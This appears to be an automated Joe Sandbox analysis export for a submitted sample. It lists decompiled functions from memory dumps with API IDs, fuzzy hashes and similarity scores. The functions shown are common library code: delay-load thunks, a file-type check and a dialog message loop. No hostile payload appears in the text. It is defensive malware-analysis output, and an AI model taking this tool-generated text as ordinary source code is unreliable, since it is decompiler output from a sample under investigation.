Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: ccc0697399e1aa5f579859ad0fcef2207fec30a4fb25317610cd927df6837b7f
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: B3D0C77121020976DF816F618C5296E79D9EB40340F04C1A5B869D5191EAB1DA109556

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E5BB Relevance: 1.5, APIs: 1, Instructions: 13
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00B7E5BB(void* __esi) {
				void* _t2;
				intOrPtr _t5;
				void* _t6;
				void* _t11;

				_t11 = __esi;
				if(( *0xb95650 & 0x00001000) == 0) {
					return _t2;
				} else {
					E00B7E664();
					_t5 =  *0xbc1ce8 + 1;
					 *0xbc1ce8 = _t5;
					if(_t5 == 1) {
						E00B7E78D(4, 0xbc1cec); // executed
					}
					_t6 = E00B7E5EE();
					if(_t6 == 0) {
						 *0xbc1ce4 = 0;
						return _t6;
					} else {
						 *0xb93278(0xbc1ce4, _t11);
						return  *((intOrPtr*)( *0xbc1ce0))();
					}
				}
			}

0x00b7e5bb
0x00b7e5c5
0x00b7e5ed
0x00b7e5c7
0x00b7e5c7
0x00b7e5d1
0x00b7e5d2
0x00b7e5da
0x00b7e5e3
0x00b7e5e3
0x00b7e831
0x00b7e838
0x00b7e852
0x00b7e85c
0x00b7e83a
0x00b7e848
0x00b7e851
0x00b7e851
0x00b7e838

APIs

DloadProtectSection.DELAYIMP ref: 00B7E5E3

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: b570e65c88a8ffd1fcb7e90e63522e29a1373b44d55d55ed09bf11f296dfcac1
Instruction ID: 6f916a2554cb726ae00569d6b944cb7c334e29aafa9feb40e82e889cd40e665e
Opcode Fuzzy Hash: b570e65c88a8ffd1fcb7e90e63522e29a1373b44d55d55ed09bf11f296dfcac1
Instruction Fuzzy Hash: 3BD0C9B01C02809ED716EBAC99C6B1A32D4FF2E704F9489C5B17DAE4A2DF64C4A1C706

Uniqueness

Uniqueness Score: -1.00%

Function 00B7DD6D Relevance: 1.5, APIs: 1, Instructions: 13
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7DD6D(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0xba8458, 0x6a, 0x402, E00B70264(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E00B7B568(); // executed
				return _t7;
			}

0x00b7dd92
0x00b7dd98
0x00b7dd9d

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00B71B3E), ref: 00B7DD92

Part of subcall function 00B7B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B7B579
Part of subcall function 00B7B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7B58A
Part of subcall function 00B7B568: IsDialogMessageW.USER32(0001042A,?), ref: 00B7B59E
Part of subcall function 00B7B568: TranslateMessage.USER32(?), ref: 00B7B5AC
Part of subcall function 00B7B568: DispatchMessageW.USER32(?), ref: 00B7B5B6

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 274ca6de98871d59736460dd8691faff30cdc8da9452d39b3a620afbf8d7a680
Instruction ID: 14d8913e42d77952314c8243444505882147e8bcf5dda6edb01717c5049dc0e4
Opcode Fuzzy Hash: 274ca6de98871d59736460dd8691faff30cdc8da9452d39b3a620afbf8d7a680
Instruction Fuzzy Hash: 60D09E32154300BAD6012B51CD06F0A7AF2AB9CF08F408595B289750B18A729D71DF11

Uniqueness

Uniqueness Score: -1.00%

Function 00B698BC Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B698BC(void* __ecx) {
				long _t3;

				if( *(__ecx + 8) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 8)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00b698c0
0x00b698c8
0x00b698d1
0x00b698da
0x00000000
0x00000000
0x00000000
0x00b698c2
0x00b698c2
0x00b698c4
0x00b698c4

APIs

GetFileType.KERNELBASE(000000FF,00B697BE), ref: 00B698C8

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 55e857fe0d971816357062dfc41878384120ba1cafa749e9e0c144ad2c13cb56
Instruction ID: 7c68ac106b5cce0016700631e377c269b6c3b2c0866c6c46cec0faebb9a60908
Opcode Fuzzy Hash: 55e857fe0d971816357062dfc41878384120ba1cafa749e9e0c144ad2c13cb56
Instruction Fuzzy Hash: 47C01238400205C68E208B24984809973A6EA537E67B4A6D4C038CB0E1C33ACC8BEA10

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E1F6 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E1F6() {

				E00B7E85D(0xb9c5ec, 0xbc315c); // executed
				goto __eax;
			}

0x00b7e1e3
0x00b7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3b243e12848c60a264a149a5088c9d2b263d909f41277309ab18d871d0e1f5c2
Instruction ID: 1a97d314e349779cebe30fb508e5628b92f4f4015678c91c60623e7a825d8e7e
Opcode Fuzzy Hash: 3b243e12848c60a264a149a5088c9d2b263d909f41277309ab18d871d0e1f5c2
Instruction Fuzzy Hash: EBB09292258000BC2204A2051803E3605CCC889B10360C0FEB839D1580A840E8041432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E1EC Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E1EC() {

				E00B7E85D(0xb9c5ec, 0xbc3160); // executed
				goto __eax;
			}

0x00b7e1e3
0x00b7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9599a8dae0d21d002c52554e1fa9d6da94d15df4f0edf05a5c3ae2d2b5309014
Instruction ID: 4693066319fc2865c88ccd3e9d369cda330a418a51492e3d2b8d366d93029975
Opcode Fuzzy Hash: 9599a8dae0d21d002c52554e1fa9d6da94d15df4f0edf05a5c3ae2d2b5309014
Instruction Fuzzy Hash: FFB012D625C100BC3204D1491C43E3705DCD8C8F10370C0FEF83DD1480E840EC401532

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E1D1 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E1D1() {

				E00B7E85D(0xb9c5ec, 0xbc316c); // executed
				goto __eax;
			}

0x00b7e1e3
0x00b7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 32a1136e64a0027336ebb72dc38e8d4908805e0bd5039688662a617c3e24d110
Instruction ID: bf1b287ebd3500bfc1218d514bab70ef7748cf4eefced4268324f28a572fcb7e
Opcode Fuzzy Hash: 32a1136e64a0027336ebb72dc38e8d4908805e0bd5039688662a617c3e24d110
Instruction Fuzzy Hash: C2B012D6258100BC3204A1451C43D3705DCC8C9F10370C4FEFC39E0880E840EC401432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E2B4 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E2B4() {

				E00B7E85D(0xb9c5ec, 0xbc3110); // executed
				goto __eax;
			}

0x00b7e1e3
0x00b7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 375b3273556eb9e97bcda376e6b5105fdbd96d5c84932cb8fc5b948bd9d316d3
Instruction ID: 8c6f8d24d29bc45f87fad2f91978fc55a9091168d5af45f42905a765586545af
Opcode Fuzzy Hash: 375b3273556eb9e97bcda376e6b5105fdbd96d5c84932cb8fc5b948bd9d316d3
Instruction Fuzzy Hash: 52B012D2258000BC3204D1051C03E7705CCD8C8F10370C4FEF83DD14C0E840EC002432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E282 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E282() {

				E00B7E85D(0xb9c5ec, 0xbc3124); // executed
				goto __eax;
			}

0x00b7e1e3
0x00b7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b0f304588562ddfcaec6b682777ea4b63e21b8337386ef4ec8aae69fb2c4a54f
Instruction ID: 59dd36df768dde46cba388cc4a36083255b9ecb236c3a8110bb913ded6558321
Opcode Fuzzy Hash: b0f304588562ddfcaec6b682777ea4b63e21b8337386ef4ec8aae69fb2c4a54f
Instruction Fuzzy Hash: 63B012E2258000BC3204D1061D43E3705CCC8C8F11370C0FEF83DD1480EC41ED011432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7EAE7 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7EAE7() {

				E00B7E85D(0xb9c6cc, 0xbc3034); // executed
				goto __eax;
			}

0x00b7eaf9
0x00b7eb00

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7EAF9

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 848dfc162d91b34e0482d3a7e2c6941d8bff1422c7dee1ec9d2b776149c43a9d
Instruction ID: 214df67846c2ec9b59e5e933580abe6ccbdafe3952737cfa2e228a8664a5dee6
Opcode Fuzzy Hash: 848dfc162d91b34e0482d3a7e2c6941d8bff1422c7dee1ec9d2b776149c43a9d
Instruction Fuzzy Hash: FDB012C72DA0427C360462001D42E3702DCC8C4F90330C0FEF538C8092EC80CC010432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E232 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E232() {

				E00B7E85D(0xb9c5ec, 0xbc3144); // executed
				goto __eax;
			}

0x00b7e1e3
0x00b7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e83b494953fd2d42262ab077cc7c54a8c3b61a7760fcb0818b3a8736d236d0cd
Instruction ID: 5c1e3f0dc13524c789e9660559439b275ee18314e6e321cc535a720cd1b32fb9
Opcode Fuzzy Hash: e83b494953fd2d42262ab077cc7c54a8c3b61a7760fcb0818b3a8736d236d0cd
Instruction Fuzzy Hash: 4DB012E2258000BD3244D1061D03E3705CCC8C8F10370C0FEF83DD1480EC40EE011432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E23C Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E23C() {

				E00B7E85D(0xb9c5ec, 0xbc3140); // executed
				goto __eax;
			}

0x00b7e1e3
0x00b7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a7d169dbb490955f2b551e1557e0fdbc75654a8d1e1fd6e31ca2d40ce4881b2d
Instruction ID: d9fa44672591d313472f463e596a8c2f7dbbc7844d8b47df9d3bdbe773b4df90
Opcode Fuzzy Hash: a7d169dbb490955f2b551e1557e0fdbc75654a8d1e1fd6e31ca2d40ce4881b2d
Instruction Fuzzy Hash: 75B012E2258000BD3244D1061C03E3705CCD8C8F10370C0FEF83DD1480E840ED001432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E228 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E228() {

				E00B7E85D(0xb9c5ec, 0xbc3148); // executed
				goto __eax;
			}

0x00b7e1e3
0x00b7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a623ad4959b3a8769a65a2e1a541064c92c6b33fad5eaf783b50ff2c2256fcbe
Instruction ID: ff828088a922139ca74baa5732a7f5dfb0c97b35780a772d475f3d54052b8681
Opcode Fuzzy Hash: a623ad4959b3a8769a65a2e1a541064c92c6b33fad5eaf783b50ff2c2256fcbe
Instruction Fuzzy Hash: 3AB012E2258100BD3284D1051C03E3705CCC8C8F10370C1FEF83DD1480E840ED401432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E21E Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E21E() {

				E00B7E85D(0xb9c5ec, 0xbc314c); // executed
				goto __eax;
			}

0x00b7e1e3
0x00b7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 404cf4343f4867da98db03325d2487d534d9389363f9473a69b55b081ba520cb
Instruction ID: 8bf5d769eff3353dca2dee361d3d161def1cf7a1d96dc294f93f522c509412d5
Opcode Fuzzy Hash: 404cf4343f4867da98db03325d2487d534d9389363f9473a69b55b081ba520cb
Instruction Fuzzy Hash: E2B092A2258000BD2244A1051803E3605CCC889F10360C0FEB839D1480A840E9001432

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E200 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7E200() {

				E00B7E85D(0xb9c5ec, 0xbc3158); // executed
				goto __eax;
			}

0x00b7e1e3
0x00b7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E1E3

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

